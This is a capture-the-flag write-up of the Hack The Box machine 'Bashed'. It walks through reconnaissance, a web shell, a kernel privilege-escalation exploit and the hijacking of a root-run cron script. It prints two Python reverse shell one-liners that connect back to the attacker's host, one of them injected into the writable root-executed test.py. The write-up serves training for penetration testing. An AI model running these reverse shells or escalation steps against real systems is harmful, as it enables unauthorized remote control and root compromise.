Bashed — Hack The Box WriteUp

Bashed is a relatively easy HTB machine that is similar to the ones on the OSCP exam (according to TJnull).

Reconnaissance

We begin the reconnaissance phase with an nmap scan. First do:

nmap -p- [bashedIP]

The -p- option scans all TCP ports. This reveals the following:

Now that we know only port 80 is open for TCP, we can start several things:

1. A deeper nmap scan (with the -A, -T4 and scripts options).
2. Explore the web page ourselves (for potential areas for SQL injections or anything else).
3. Start a directory buster on the IP since it is hosting a web server.

Here is a more intensive nmap scan:

The deeper nmap scan does not reveal anything too important except that it is Apache Httpd 2.4.18. Searching google for “Apache 2.4.18 exploit” was not very fruitful. Hence we move on to the next step and visit the webpage:

Here is what the webpage looks like when we visit it:

I explored the other links on the page but they were not potential attack vectors nor they had any clues. So, we move to the final step of running a directory buster:

Here are the results of a dirsearch.py scan of Bashed:

The most interesting results are /uploads and /dev but for good measure we should visit all the pages listed. /uploads returns an empty page but /dev returns something interesting:

Clicking on either gives a shell. We are www-data and are actually able to get the user flag from here:

Reverse Shell

We would like to get a reverse shell to proceed with privilege escalation. I searched for reverse shells by pentestmonkey but a lot of them did not work. Eventually the python one worked:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We have a reverse shell and upgrade the shell as follows:

Internal Reconnaissance

First we need to check our privileges with sudo. We will see that we have all of the privileges of scriptmanager (sounds interesting!). So, we run bash as scriptmanager:

Next I want to run LinPeas so I transfer the linpeas.sh file from my Kali machine to Bashed using HTTP. (Don’t forget to change the mode of the file).

When running linpeas, two things stand out. Firstly, the linux version: 4.4.0–62-generic:

Secondly, the mysterious scripts folder (/scripts) that modified test.txt 5 mins ago:

Privilege Escalation: Method 1 (Kernel Exploit)

The box is running Ubuntu 16.04.2 LTS with kernel 4.4.0–62-generic. When searching for vulnerabilities for that, I came across EDB 44298. This exploit is for Linux Kernel < 4.4.0–116 (Ubuntu 16.04.4) and it is a Local Privilege Escalation. If it works, this is exactly what we need.

In a real-life scenario be careful with kernel exploits as it may crash the system. I also came across EDB 41458 which would seem to work based on the requirements (Ubuntu Linux kernel 4.4.0) but it crashed my box.

After downloading the C file on our local machine, we then need to compile the exploit on the local machine (because Bashed does not have gcc installed). After compiling the C file we need to set up a web server to transfer the compiled binary to Bashed:

We download the file on bashed and add the executable permission:

All now that is left to do is to compile the program and we get root!

Privilege Escalation: Method 2 (/scripts)

In the /scripts folder we see two files: test.py and test.txt. We know from the linpeas enumeration that test.txt was created 5 mins ago hence it is very likely that test.py is being run every 5 mins or so. Moreover, test.py is owned by scriptmanager (us!) and test.txt is owned by root:

What if we modify test.py to start another reverse shell which we can expect to give us root access because the output of test.py, test.txt, is root-owned file. So, we echo a python reverse shell into test.py as follows:

'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We also start a netcat listener on port 4445 and we get a connection as root!

Final Thoughts

When I did the box I knew /scripts was the way to go for privilege escalation but I was unable to do it. I was trying to spawn an interactive bash shell with python instead of starting a reverse shell. But I did further enumeration and came across the linux kernel exploit. I believe the kernel exploit was not meant to be the way to do this but nevertheless I got root with it :)